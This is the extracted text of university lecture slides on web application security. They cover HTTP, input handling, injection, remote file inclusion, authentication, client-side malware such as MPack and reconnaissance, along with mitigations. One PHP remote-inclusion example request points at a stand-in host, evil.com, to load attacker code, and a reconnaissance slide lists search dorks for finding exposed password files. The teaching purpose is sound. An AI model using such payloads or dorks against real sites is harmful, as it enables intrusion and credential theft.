CSC 482582 Computer Security Web Security CSC 482582

CSC 482/582: Computer Security Web Security CSC 482/582: Computer Security Slide #1

Topics 1. 2. 3. 4. 5. Why web application security? HTTP and web input types Web Application Vulnerabilities Client-side Attacks Finding Web Vulnerabilities CSC 482/582: Computer Security Slide #2

Why Web Application Security? CSC 482/582: Computer Security Slide #3

Why Web Application Security? CSC 482/582: Computer Security Slide #4

Web Transactions est u q e PR Web Server HTT Web Browser Network OS e pons s e R P T HT CSC 482/582: Computer Security Slide #5

HTTP: Hyper. Text Transfer Protocol Simple request/respond protocol �Request methods: GET, POST, HEAD, etc. �Protocol versions: 1. 0, 1. 1 Stateless �Each request independent of previous requests, i. e. request #2 doesn’t know you auth’d in #1. �Applications responsible for handling state. CSC 482/582: Computer Security Slide #6

HTTP Request Method URL Protocol Version GET http: //www. google. com/ HTTP/1. 1 Headers Host: www. google. com User-Agent: Mozilla/5. 0 (Windows NT 5. 1) Gecko/20060909 Firefox/1. 5. 0. 7 Accept: text/html, image/png, */* Accept-Language: en-us, en; q=0. 5 Cookie: rememberme=true; PREF=ID=21039 ab 4 bbc 49153: FF=4 Blank Line No Data for GET method CSC 482/582: Computer Security Slide #7

HTTP Response Protocol Version HTTP Response Code HTTP/1. 1 200 OK Headers Cache-Control: private Content-Type: text/html Blank Server: GWS/2. 1 Line Date: Fri, 13 Oct 2006 03: 16: 30 GMT <HTML>. . . (page data). . . </HTML> Web Page Data CSC 482/582: Computer Security Slide #8

Different Perspectives Client Side • HTTP requests may reveal private info. • HTTP responses may include malicious code (Java, Active. X, Javascript) CSC 482/582: Computer Security Slide #9 Server Side • HTTP requests may contain malicious input. • HTTP requests may have forged authentication. • HTTP responses may be intercepted.

Web-based Input �Client and Server Perspectives �Types of Input �URL parameters �HTML �Cookies �Javascript �Cross-Site Scripting CSC 482/582: Computer Security Slide #10

URL Format <proto>: //<user>@<host>: <port>/<path>? <qstr> �Whitespace marks end of URL �“@” separates userinfo from host �“? ” marks beginning of query string �“&” separates query parameters �%HH represents character with hex values �ex: %20 represents a space http: //username: password@www. auth. com: 8001/a%20 spaced%20 path CSC 482/582: Computer Security Slide #11

URL Parameters �Client controls query-string �Cannot limit values to those specified in form �Any character can be URL-encoded �Even if it doesn’t need to be. �Any valid format may be used to disguise true destination of URL CSC 482/582: Computer Security Slide #12

URL Obfuscation IP address representations �Dotted quad (decimal, octal, hexadecimal) �Hexadecimal without dots (with left padding) �dword (32 -bit int) Examples: www. eecs. utoledo. edu � 131. 183. 19. 14 (dotted quad) � 0 x. DEDA 83 B 7130 E (hexadecimal + padding) � 2209813262 (dword) CSC 482/582: Computer Security Slide #13

HTML Special Characters �“<“ begins a tag �“>” ends a tag �some browsers will auto-insert matching “<“ �“&” begins a character entity �ex: < represents literal “<“ character �Quotes(‘ and “) used to enclose attribute values CSC 482/582: Computer Security Slide #14

Character Set Encoding �Default: ISO-8859 -1 (Latin-1) �Char sets dictate which chars are special �UTF-8 allows multiple representations �Force Latin-1 encoding of web page with: �<META http-equiv=“Content-Type” content=“text/html; charset=ISO-8859 -1”> CSC 482/582: Computer Security Slide #15

Hidden Fields <input type=“hidden” name=“user” value=“james”> �Used to propagate data between HTTP requests since protocol is stateless �Clearly visible in HTML source �Form can be copied, modified to change hidden fields, then used to invoke script CSC 482/582: Computer Security Slide #16

Cookies Server to Client Content-type: text/html Set-Cookie: foo=bar; path=/; expires Fri, 20 -Feb-2004 23: 59: 00 GMT Client to Server Content-type: text/html Cookie: foo=bar CSC 482/582: Computer Security Slide #17

Web Input Summary Client Side • URLs may not lead where they seem to. • Cookies can be used to track your browsing. • Pages may include malicious code (Java, Active. X, Javascript) CSC 482/582: Computer Security Slide #18 Server Side • Cookies aren’t confidential. • Hidden fields aren’t secret. • Client may use own forms. • URLs can have any format. • POST data can have any format. • Cookies can have any format.

Web Application Vulnerabilities CSC 482/582: Computer Security Slide #19

Common Vulnerability Types CSC 482/582: Computer Security Slide #20

Injection �Injection attacks trick an application into including unintended commands in the data send to an interpreter. �Interpreters �Interpret strings as commands. �Ex: SQL, shell (cmd. exe, bash), LDAP, XPath �Key Idea �Input data from the application is executed as code by the interpreter. �Discussed in detail in its own lecture. CSC 482/582: Computer Security Slide #21

Cross-Site Attacks �Attacker causes a legitimate web server to send user executable content (Javascript, Flash Active. Script) of attacker’s choosing. �XSS used to obtain session ID for �Bank site (transfer money to attacker) �Shopping site (buy goods for attacker) �Key ideas �Attacker sends malicious code to server. �Victim’s browser loads code from server and runs it. �Discussed in detail in its own lecture. March 4, 2009 SIGCSE

Insecure Remote File Inclusion �Insecure remote file inclusion vulnerabilities allow an attack to trick the application into executing code provided by the attacker on another site. �Dynamic code �Includes in PHP, Java, . NET �DTDs for XML documents �Key Idea �Attacker controls pathname for inclusion. CSC 482/582: Computer Security Slide #23

PHP Remote Inclusion Flaw A PHP product uses "require" or "include" statements, or equivalent statements, that use attacker-controlled data to identify code or HTML to be directly processed by the PHP interpreter before inclusion in the script. <? php // index. php include('config. php'); include('include. php'); // Script body ? > <? php //config. php $server_root = '/my/path'; ? > <? php //include. php include($server_root. '/someotherfile. php'); ? > GET /include. php? server_root=http: //evil. com/command. txt CSC 482/582: Computer Security Slide #24

Mitigating Remote File Inclusion 1. 2. 3. 4. Turn off remote file inclusion. Do not run code from uploaded files. Do not user-supplied paths. Validate all paths before loading code. CSC 482/582: Computer Security Slide #25

Authentication �Authentication is the process of determining a user’s identity. �Key Ideas �HTTP is a stateless protocol. �Every request must be authenticated. �Use username/password on first request. �Use session IDs on subsequent queries. March 4, 2009 SIGCSE

Authentication Attacks �Sniffing passwords �Guessing passwords �Identity management attacks �Replay attacks �Session ID fixation �Session ID guessing CSC 482/582: Computer Security Slide #27

Identity Management Attacks Auth requires identity management �User registration �Password changes and resets Mitigations �Use CAPTCHAs to protect registration. �Don’t use easy to guess secret questions. �Don’t allow attacker to reset e-mail address that new password is sent to. CSC 482/582: Computer Security Slide #28

Session ID Guessing Do session IDs show a pattern? �How does changing username change ID? �How do session IDs change with time? Brute forcing session IDs �Use program to try 1000 s of session IDs. Mitigating guessing attacks �Use a large key space (128+ bits). �Use a cryptographically random algorithm. CSC 482/582: Computer Security Slide #29

Mitigating Authentication Attacks �Use SSL to prevent sniffing attacks. �Require strong passwords. �Use secure identity management. �Use a secure session ID mechanism. �IDs chosen at random from large space. �Regenerate session IDs with each request. �Expire session IDs in short time. CSC 482/582: Computer Security Slide #30

Access Control �Access control determines which users have access to which system resources. �Levels of access control �Site �URL �Function(parameters) �Data CSC 482/582: Computer Security Slide #31

Mitigating Broken Access Control 1. 2. 3. 4. Check every access. Use whitelist model at every layer. Do not rely on client-level access control. Do not rely on security through obscurity. CSC 482/582: Computer Security Slide #32

Improper Error Handling �Applications can unintentionally leak information about configuration, architecture, or sensitive data when handling errors improperly. �Errors can provide too much data �Stack traces �SQL statements �Subsystem errors �User typos, such as passwords. CSC 482/582: Computer Security Slide #33

Example of Improper Error Handling my. SQL error with query SELECT COUNT(*) FROM nucleus_comment as c WHERE c. citem=90: Can't open file: 'nucleus_comment. MYI' (errno: 145) Warning: mysql_fetch_row(): supplied argument is not a valid My. SQL result resource in /home/exalt 2/public_html/username/nucleus/lib s/COMMENTS. php on line 124 CSC 482/582: Computer Security Slide #34

Mitigating Improper Error Handling 1. 2. 3. 4. 5. 6. Catch all exceptions. Check all error codes. Wrap application with catch-all handler. Send user-friendly message to user. Store details for debugging in log files. Don’t log passwords or other sensitive data. CSC 482/582: Computer Security Slide #35

Insecure Storage �Storing sensitive data without encrypting it, or using a weak encryption algorithm, or using a strong encryption system improperly. �Problems �Not encrypting sensitive data. �Using home grown cryptography. �Insecure use of weak algorithms. �Storing keys in code or unprotected files. CSC 482/582: Computer Security Slide #36

Storage Recommendations Hash algorithms �MD 5 and SHA 1 look insecure. �Use SHA 256. Encrypting data �Use AES with 128 -bit keys. Key generation �Generate random keys. �Use secure random source. CSC 482/582: Computer Security Slide #37

Mitigating Insecure Storage 1. 2. 3. 4. 5. Use well studied public algorithms. Use truly random keys. Store keys in protected files. Review code to ensure that all sensitive data is being encrypted. Check database to ensure that all sensitive data is being encrypted. CSC 482/582: Computer Security Slide #38

Insecure Communication �Applications fail to encrypt sensitive data in transit from client to server and vice-versa. �Need to protect �User authentication and session data. �Sensitive data (CC numbers, SSNs) �Key Idea �Use SSL for all authentication connections. CSC 482/582: Computer Security Slide #39

Mitigating Insecure Communication 1. 2. 3. Use SSL for all authenticated sessions. Use SSL for all sensitive data. Verify that SSL is used with automated vulnerability scanning tools. CSC 482/582: Computer Security Slide #40

Client-side Attacks �Buffer Overflow � 2004 iframe � 2004 -05 jpeg �Remote Code �Active. X �Flash �Javascript CSC 482/582: Computer Security Slide #41

Active. X Executable code downloaded from server �Activated by HTML object tag. �Native code binary format. Security model – Digital signature authentication – Zone-based access control – No control once execution starts CSC 482/582: Computer Security Slide #42

Java �Digital signature authentication �Sandbox Components • Byte-code verifier • Class loader • Security manager CSC 482/582: Computer Security Slide #43 Sandbox Limits • Cannot read/write files. • Cannot start programs. • Network access limited to originating host.

MPack Browser Malware 1. 2. 3. 4. 5. 6. 7. User visits site. Response contains iframe. Iframe code causes browser to make request. Request redirected to MPack server. Server identifies OS and browser, sends exploit that will work for client configuration. Exploit causes browser to send request for code. Mpack downloader sent to user, begins d/ling other malware. CSC 482/582: Computer Security Slide #44

MPack Commercial underground PHP software �Sold for $700 -1000. �Comes with one year technical support. �Can purchase updated exploits for $50 -150. Infection Techniques �Hacking into websites and adding iframes. �Sending HTML mail with iframes. �Typo-squatting domains. �Use Google. Ads to draw traffic. CSC 482/582: Computer Security Slide #45

Client Protection �Disable Active. X and Java. �Use No. Script to limit Javascript. �Run browser with least privilege. �Use a browser sandbox: �VMWare Virtual Browser Appliance �Protected Mode IE (Windows Vista) �Goto sites directly instead of using links. �Use plain text e-mail instead of HTML. �Patch your browser regularly. �Use a personal firewall. CSC 482/582: Computer Security Slide #46

Web Reconnaissance Google Hacking �“Index of” +passwd �“Index of” +password. txt �filetype: htaccess user �allinurl: _vti_bin shtml. exe Web Crawling Santy Worm used Google to find vulnerable servers. �wget --mirror http: //www. w 3. org/ -o /mirror/w 3 CSC 482/582: Computer Security Slide #47

Proxies and Vulnerability Scanners �Achilles �OWASP Web Scarab �Paros Proxy �SPI Dynamics Web. Inspect Edit Web Data • URL • Cookies • Form Data Web Browser CSC 482/582: Computer Security Slide #48 Web Proxy Web Server

Achilles Proxy Screenshot CSC 482/582: Computer Security Slide #49

Key Points �All input can be dangerous �URLs, Cookies, Executable content �Consider both client and server security. �SSL is not a panacea �Confidentiality + integrity of data in transit. �Input-based attacks can be delivered via SSL. �Top Vulnerabilities �Cross-Site Scripting �SQL Injection �Remote File Inclusion CSC 482/582: Computer Security Slide #50

References 1. 2. 3. 4. 5. 6. 7. 8. 9. Andreu, Professional Penetration Testing for Web Applications, Wrox, 2006. Daswani et. al. , Foundations of Security, Apress, 2007. Friedl, SQL Injection Attacks by Example, http: //unixwiz. net/techtips/sql-injection. html, 2007. IBM, IBM X-Force 2010 Mid-Year Trend and Risk Report, http: //www-935. ibm. com/services/us/iss/xforce/trendreports/, 2010. OWASP, OWASP Top 10 for 2010, http: //www. owasp. org/index. php/Category: OWASP_Top_Ten_ Project Neils Provos et. al. , “The Ghost in the Browser: Analysis of Webbased Malware, ” Hotbots 07, http: //www. usenix. org/events/hotbots 07/tech/full_papers/prov os/provos. pdf, 2007. Samy, “My. Space Worm Explanation, ” http: //namb. la/popular/tech. html, 2005. Joel Scambray, Mike Shema, Caleb Sima, Hacking Exposed Web Applications, Second Edition, Mc. Graw-Hill, 2006. Stuttart and Pinto, The Web Application Hacker’s Handbook, Wiley, 2007. CSC 482/582: Computer Security Slide #51